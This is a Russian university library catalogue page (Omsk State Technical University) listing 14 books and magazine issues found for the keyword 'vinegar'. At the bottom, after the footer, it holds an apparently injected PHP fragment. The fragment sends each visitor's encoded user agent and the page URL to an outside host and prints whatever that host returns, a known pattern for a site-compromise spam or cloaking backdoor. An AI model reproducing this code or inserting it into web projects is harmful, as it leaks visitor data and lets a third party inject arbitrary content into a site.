Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

290 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Уксус")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
Вытовтов А. А. Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов, 2015. - 575 с.
Держатели документа (Информация об экземплярах) 
2. 
Краткий очерк лесной промышленности и торговли лесом в России и в важнейших иностранных государствах [Текст] / сост. Б. П. Мрозовский, 1900. - IV, 374 с. с.
Держатели документа (Информация об экземплярах) 

Сведения о величине лесной площади, составе лесных насаждений в различных регионах России. Вопросы развития лесной промышленности (заготовка, обработка и переработка леса), торговли (ввоз и вывоз леса, цены) и утилизации лесных отходов. Во второй части издания - данные по зарубежным странам.

3. 
Вытовтов, Анатолий Андреевич. Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов, 2013. - 574, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник написан с учетом требований Федерального закона "О техническом регулировании" общих и специальных технических регламентов, других нормативных документов. Рассмотрены потребительская ценность, классификация, основы технологии, фальсификация, требования к упаковке, маркировке, условиям хранения, требованиям к показателям качества и безопасности, оценка соответствия, экспертиза различных групп и видов вкусовых товаров.

Для студентов высших и средних профессиональных образовательных учреждений, обучающихся по специальности "Товароведение и экспертиза товаров", слушателей системы повышения квалификации, а также практических работников.

4. 
Химия и жизнь - XXI век. - Журнал, 2011г. № 6
Оглавление 
  • Эрлих, Г. В. Чему учить на уроках химии? / Г. В. Эрлих. - с.2-7
  • Левицкий, М. М. Пирамидка, карусель и новая царская водка / М. М. Левицкий, Д. С. Перекалин. - с.8-12
  • Вакулка, А. А. Фреоны: продолжение следует / А. А. Вакулка. - с.13-15
  • Комаров, С. М. Эпигенетка вместо инсулина / С. М. Комаров. - с.16
  • Комаров, С. М. Замена сосуда / С. М. Комаров. - с.16
  • Комаров, С. М. Блистательная Хаумея / С. М. Комаров. - с.16
  • Комаров, С. М. Гриб управляет муравьем / С. М. Комаров. - с.16
  • Комаров, С. М. Гибкие датчики / С. М. Комаров. - с.17
  • Комаров, С. М. Электронопровод / С. М. Комаров. - с.17
  • Комаров, С. М. Борьба с засухой по-бельгийски / С. М. Комаров. - с.17
  • Комаров, С. М. Бактерия бьет плазмодий / С. М. Комаров. - с.17
  • Акасов, Р. Янтарная кислота: ювелирная работа / Р. Акасов. - с.18-21
  • Прозоровский, В. Б. Дибазол, лекарство от всего / В. Б. Прозоровский, С. М. Рамш. - с.22-25
  • Викторова, Л. Светящиеся палочки / Л. Викторова, А. Мотыляев. - с.26-27
  • Викторова, Л. Суп из долларов / Л. Викторова, А. Мотыляев. - с.27
  • Викторова, Л. Помидоры и гормон / Л. Викторова, А. Мотыляев. - с.27
  • Лалаянц, И. Э. Солнце всходит и заходит / И. Э. Лалаянц. - с.28-32
  • Резник, Н. Л. Вопросы веса и кормления / Н. Л. Резник. - с.33-35
  • Бурлак, С. А. Что нужно для языка? / С. А. Бурлак. - с.33-35
  • Цуркан, В. Бабушкины щи / В. Цуркан. - с.39
  • Александрин, В. В. На смерть поэта. Взгляд патофизиолога / В. В. Александрин. - с.40-42
  • Хатуль, Л. Индивид и ансамбль: молекулы, монетки, люди, звезды... / Л. Хатуль. - с.44-47
  • Паравян, Н. А. Рассказы юнната / Н. А. Паравян. - с.48-50
  • Лясота, Е. Популярная химия сталинской эпохи / Е. Лясота. - с.52-53
  • Ручкина, Н. Уксус / Н. Ручкина. - с.54-55
  • Берестнев, С. Нештатная ситуация / С. Берестнев. - с.57-61
  • Анофелес, С. Иная планета / С. Анофелес. - с.62
  • Мотыляев, А. Сила сетевого слова / А. Мотыляев. - с.63
  • Демина, М. Во что одеты дороги / М. Демина. - с.64-65
Держатели документа (Информация об экземплярах) 
5. 
Питание и общество. - Журнал, 2013г. № 7
Оглавление 
  • Забнев, С. Какой чай полезнее: черный или зелёный? / С. Забнев. - с.11
    Кл. слова: ЧАЙ ЧЕНЫЙ, ЧАЙ ЗЕЛЁНЫЙ
  • Арефьева, А. Что такое уксус и с чем его едят / А. Арефьева. - с.26-27
    Кл. слова: УКСУС
  • "Современная израильская кухня". - с.30-31
    Кл. слова: КУХНЯ ИЗРАИЛЬСКАЯ
6. 
Наука и жизнь. - Журнал, 2002г. № 7
Оглавление 
  • Колесов, А. Ленские столбы / А. Колесов. - с.6-8
  • Ефремова, Н. Александровская колонна / Н. Ефремова. - с.14-18
  • Иванов, Г. А. Взрывная энергетика / Г. А. Иванов. - с.9-12
  • Остапенко, А. На берегах "Молочной реки" / А. Остапенко. - с.19-22
  • Каданников, В. Автомобиль для России и россиян / В. Каданников. - с.23-26
  • Оловникова, Н. Группы крови: 100 лет спустя после открытия / Н. Оловникова. - с.30-35
  • Еськова, Н. Лесник и лесничий / Н. Еськова. - с.35
  • Бобылев, В. Королев в моей жизни / В. Бобылев. - с.36-37
  • Юрьев, З. Комбеллга - новейшие технологии для общения / З. Юрьев. - с.42-43
  • Некрасов, А. Безопасность в логистике / А. Некрасов. - с.50-52
  • Ярхо, В. Как учили и учились в Древней Руси / В. Ярхо. - с.54-59
  • Фролов, Ю. Здесь варят пиво / Ю. Фролов. - с.62-65
  • Букет плетистых роз. - с.66-67
  • Дать камню жизнь. - с.68-70
  • Лалаянц, И. Гомо сапиенс и геном / И. Лалаянц. - с.74-80
  • Ветвистое древо наших предков. - с.80-83
  • Манвелов, Л. В разгар лета / Л. Манвелов. - с.86-89
  • Чернышов, Ю. Как настроить Microsoft Word? / Ю. Чернышов. - с.90-91
  • Звягина, Е. Философия подаяния / Е. Звягина. - с.92-100
  • Зыков, Д. Только после вас / Д. Зыков. - с.104-105
  • Сильгер, Д. Отвергнутый жених / Д. Сильгер. - с.107
  • Кустова, Н. Уксус. Что это такое и как его делают / Н. Кустова. - с.108-111
  • Онегов, А. Попробуйте завести пчел / А. Онегов. - с.112-113
  • Тараторин, А. Правдивые истории / А. Тараторин. - с.116-126
  • Коноплева, Н. Самая "малая техника" для кухни / Н. Коноплева. - с.132-136
  • Клещей бояться - в лес не ходить?. - с.138-139
  • Домрина, Н. Полет на пределе возможного / Н. Домрина. - с.142-144
Держатели документа (Информация об экземплярах) 
7. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
8. 
Герасимова В. А. Товароведение и экспертиза вкусовых товаров [Текст] : учеб. для студ. высш. учеб. заведений / В. А. Герасимова, Е. С. Белокурова, А. А. Вытовтов, 2005. - 396 с.
Держатели документа (Информация об экземплярах) 
9. 
Кортиков В. Н. Рецепты народной медицины [Текст] / В. Н. Кортиков, А. В. Кортиков ; дар. Н. Е. Бадаева, 2000. - 799 с.
Держатели документа (Информация об экземплярах) 
10. 
Эткинс П. Молекулы [Текст] / П. Эткинс ; пер. с англ. А. А. Кирюшкина, 1991. - 215 с.
Держатели документа (Информация об экземплярах) 
11. 
Джарвис Д. С. Мед и другие естественные продукты [Текст] : опыт и исслед. одного врача / Д. С. Джарвис, 1991. - 43, [2] с.
Держатели документа (Информация об экземплярах) 
12. 
Джарвис Д. С. Мед: Лечение медом и другими естественными продуктами [Текст] : опыт и исслед. одного врача / Д. С. Джарвис, 1993. - 271, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Коробкина, Зоя Васильевна. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / З. В. Коробкина, С. А. Страхова, 2003. - 352 с.
14. 
Чепурной, Иван Петрович. Товароведение и экспертиза вкусовых товаров [Текст] : Учеб. для вузов по специальности "Товароведение и экспертиза товаров" / И. П. Чепурной, 2002. - 402, [1] с.

Вкусовые товары включают очень разнообразные по составу и свойствам <продовольственные> товары: <чай> и <кофе>, <пряности> и <приправы>, <безалкогольные> и <алкогольные> <напитки>. В данной книге представлены достаточно полные сведения о классификации этих групп товаров, приводятся факторы, формирующие и сохраняющие их <качество>.

Впервые приводятся методологические подходы к проведению экспертизы этой группы товаров с использованием как современных методов анализа, так и оригинальных экспресс-методов.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.15 с.18 запросов, 0.87c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;